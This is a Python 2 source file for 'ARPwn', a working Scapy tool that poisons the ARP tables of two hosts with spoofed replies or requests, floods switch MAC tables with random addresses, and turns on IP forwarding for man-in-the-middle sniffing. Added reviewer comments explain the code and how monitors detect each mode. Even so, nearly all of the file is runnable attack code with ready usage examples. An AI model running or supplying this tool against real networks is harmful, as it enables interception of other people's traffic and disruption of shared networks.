#!/usr/bin/python
#
# ARPwn v0.2 (2013)
# Muffin's ARP Poisoning Tool
#
# This tool can poison the ARP tables of two targets with
# either ARP replies OR ARP requests. It can also flood the ARP
# table of a single machine or a whole subnet( $10,000 switch = $10 hub )
#
#Usage:
#
# Enable ip forwarding with "./arpwn -f 1", where 1 is ON and 0 is OFF
#
#Two way ARP poisoning:
#
# "./arpwn -flag delay target_ip1 target_ip2", where -flag = -r or -q
#
# -r is for ARP replies and -q is for ARP requests
#
# delay is an integer
#
# Now you can open your sniffing software and capture.
#
#MAC Flooding:
#
# "./arpwn -m Target_MAC SRC_IP"
#
# IMPORTANT: SRC_IP is a spoofed source ip of the form W X Y Z
# where W X Y Z are integers 0-255 or rand
#
# Example: "./arpwn -m ff:ff:ff:ff:ff:ff 10 rand 0 rand"
#
# Here rand will cause the program to generate a random integer
# 0-255. So this example might generate the first ip as
#
# 10.32.0.125, or 10.15.0.12, or any other ip of that form.
#
# NOTE: If using rand, each new ARP packet will mostly
# have a different ip, of course there will be repeats at some point.
#
# Questions? Email me at gotnerdy@gmail.com
#
# Reviewer notes (added during review; not part of the author's header):
#   * Python 2 source (print statements). Scapy is the only non-stdlib import.
#   * The whole script is one try/except/else. Every handler is a bare
#     "except:", which in Python also catches KeyboardInterrupt and SystemExit.
#   * Command-line values are copied into packet fields without validation;
#     only `delay` and the -f argument are passed through int().
#   * What each mode puts on the wire, and what that looks like to a monitor,
#     is annotated at the corresponding branch below.
from scapy.all import *
import sys
import time
import os

try:
    # Mode dispatch on argv[1]. A missing argument raises IndexError and a
    # non-integer delay raises ValueError; both fall to the outer handler,
    # which prints the usage text.
    if sys.argv[1] == "-r" :
        delay = int(sys.argv[2])
        victim1 = sys.argv[3]
        victim2 = sys.argv[4]
        #mac = sys.argv[3]
        a = ARP()
        a.op = 2  # ARP opcode 2 = reply ("is-at")
        #a.hwdst = mac
        print ""
        print "ARPwn v0.2 (2013)"
        print "Muffins' ARP Poisoning Tool"
        print ""
        print "ARP Reply Mode"
        print "Victim 1: "+victim1
        print "Victim 2: "+victim2
        print "Continuous Delay: "+str(delay)+" second(s)"
        print ""
        print "Ctrl-C to quit"
        try:
            # Each pass sends two unsolicited replies: one claiming argv[3]'s
            # IP towards argv[4], then the mirror image. hwsrc is never set,
            # so Scapy's default applies (presumably the sending interface's
            # MAC - confirm against the Scapy version in use).
            # Detection: the same IP switching to a new MAC, repeated every
            # `delay` seconds, is what ARP-binding monitors and switch-level
            # Dynamic ARP Inspection are built to flag.
            while 1:
                a.psrc = sys.argv[3]
                a.pdst = sys.argv[4]
                send(a,verbose = 0)
                a.psrc = sys.argv[4]
                a.pdst = sys.argv[3]
                send(a,verbose = 0)
                time.sleep(delay)
        except:
            # Bare except: Ctrl-C (KeyboardInterrupt) and any send error land
            # here. sys.exit(0) raises SystemExit inside the outer try, so the
            # outer bare except catches it and prints the usage text as well.
            sys.exit(0)
    elif sys.argv[1] == "-q":
        delay = int(sys.argv[2])
        victim1 = sys.argv[3]
        victim2 = sys.argv[4]
        a = ARP()
        a.op = 1  # ARP opcode 1 = request ("who-has")
        print ""
        print "ARPwn v0.2 (2013)"
        print "Muffins' ARP Poisoning Tool"
        print ""
        print "ARP Request Mode"
        print "Victim 1: "+victim1
        print "Victim 2: "+victim2
        print "Continuous Delay: "+str(delay)+" second(s)"
        print ""
        print "Ctrl-C to quit"
        try:
            # Same two-packet loop as -r, but the packets are requests whose
            # sender fields carry the spoofed IP. Monitors that only inspect
            # ARP replies would not see this variant; binding checks need to
            # cover the sender fields of requests too.
            while 1:
                a.psrc = sys.argv[3]
                a.pdst = sys.argv[4]
                send(a,verbose = 0)
                a.psrc = sys.argv[4]
                a.pdst = sys.argv[3]
                send(a,verbose = 0)
                time.sleep(delay)
        except:
            # Same exit path as the -r branch (SystemExit is re-caught by the
            # outer handler).
            sys.exit(0)
    elif sys.argv[1] == "-m":
        try:
            e = Ether()
            a = ARP()
            a.op = 2  # ARP reply
            e.dst = sys.argv[2]
            e.hwdst = sys.argv[2]
            print ""
            print "ARPwn v0.2 (2013)"
            print "Muffins' ARP Poisoning Tool"
            print ""
            print "MAC Flooding "+str(sys.argv[2])
            print ""
            print "Ctrl-C to quit"
            # No sleep in this loop: frames leave as fast as sendp() returns.
            # Detection/mitigation: a single switch port presenting a rapid
            # stream of never-seen source MACs is the signature; per-port MAC
            # limits (port security) bound the effect on the switch's table.
            while 1:
                # A new RandMAC() object is created on every pass and assigned
                # to both the Ethernet source and the ARP sender hardware field.
                src_mac = RandMAC()
                e.src = src_mac
                a.hwsrc = src_mac
                # Build the dotted sender IP from argv[3]..argv[6]; the literal
                # "rand" is replaced by a random octet. Values are not checked
                # to be 0-255.
                # `random` is not imported by name in this file; presumably it
                # arrives through the scapy wildcard import - confirm.
                if sys.argv[3] == "rand":
                    result = str(random.randint(0,255))
                else:
                    result = str(sys.argv[3])
                for t in range(4,7):
                    if sys.argv[t] == "rand":
                        result = result+"."+str(random.randint(0,255))
                    else:
                        result = result+"."+sys.argv[t]
                a.psrc = result
                # sendp() transmits the hand-built Ether/ARP frame at layer 2.
                sendp(e/a,verbose = 0)
        except:
            # Any error above (including a missing octet argument) exits here
            # without its own message; the outer handler then prints usage.
            sys.exit(0)
    elif sys.argv[1] == "-f":
        try:
            # Toggles kernel IPv4 forwarding on the local Linux host. The
            # shell strings are constants (no argv text is interpolated), so
            # the command line cannot inject shell syntax here. os.system's
            # return status is ignored, so the ON/OFF message prints even if
            # the write failed (for example when not run as root).
            # Defensive note: ip_forward=1 on a host that is not meant to
            # route is itself a useful host-level indicator.
            if int(sys.argv[2]) == 0:
                os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
                print "IP Forwarding is now OFF"
            elif int(sys.argv[2]) == 1:
                os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
                print "IP Forwarding is now ON"
            # Any other integer falls through silently.
        except:
            sys.exit(0)
    else:
        # Unknown flag: nothing happens and no usage text is shown.
        pass
except:
    # Reached for argument errors and also for the SystemExit raised by the
    # inner handlers, so this text appears after a normal Ctrl-C too.
    print ""
    print "You have done something wrong."
    print ""
    print "Usage:"
    print " For two-way arp poisoning"
    print " ./arpwn -type delay target_ip1 target_ip2"
    print " where -type is r for ARP replay"
    print " where -type is q for ARP request"
    print ""
    print " ex: ./arpwn -r 10 192.168.1.23 192.168.1.1"
    print ""
    print " For mac flood"
    print " ./arpwn -m DST_MAC SPOOF_IP"
    print " where DST is the destination mac"
    print " where SPOOF_IP is 0-225 or rand "
    print ""
    print " ex: ./arpwn -m ff:ff:ff:ff:ff:ff 192 168 1 rand"
    print ""
else:
    # Runs only when the try body finished without raising anything.
    pass